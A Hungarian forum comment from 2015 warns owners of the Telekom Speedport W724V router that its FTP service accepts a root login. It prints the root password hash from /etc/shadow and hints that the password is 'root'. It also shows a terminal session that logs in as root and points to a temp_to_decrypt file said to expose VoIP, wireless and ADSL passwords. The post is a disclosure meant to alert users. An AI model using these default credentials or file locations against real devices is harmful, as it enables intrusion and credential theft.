( gemnon | 2015. 03. 18., sze – 18:07 )

Mivel láttam, hogy más is belefutott ebbe (igaz, hogy őt valószínűleg egy kínai bot találta meg):

https://kozosseg.telekom.hu/t5/Internet/Speedport-W724V/td-p/1098/page/…

És két hónap alatt nem sok reakciót váltott ki, aki esetleg NAS-ként is használná a dobozt és neadjisten még az internetre is ki meri engedni az ftp-n, annak az alábbit ajánlanám a figyelmébe:


~ # cat /etc/shadow
root:$1$qGmxLn8v$yTzaaXdb6.6QLLgS0Euz.1:12571:0:99999:7:::

we all know that root is a bot friendly password

De a jól beállított vsftpd (mert ugye very secure) megvéd minket ugye:


root@osmc:/home/osmc# ftp 192.168.1.254
Connected to 192.168.1.254.
220 (vsFTPd 2.2.2)
Name (192.168.1.254:osmc): root
331 User name OK, Enter PASS command
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
lrwxrwxrwx    1 0        0               9 Jun 25  2014 bin -> usr/sbin/
...
-rw-r--r--    1 0        0         1625911 Jun 25  2014 vmlinux.lz
226 Directory send OK.
ftp> cd tmp
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
...
-rw-------    1 0        0           33141 Mar 18 16:35 temp_to_decrypt 
<-- possible way to recover your voip/wireless/adsl password
...
226 Directory send OK.
having that and using jffs2 filesystem makes us an ideal botnet platform. :P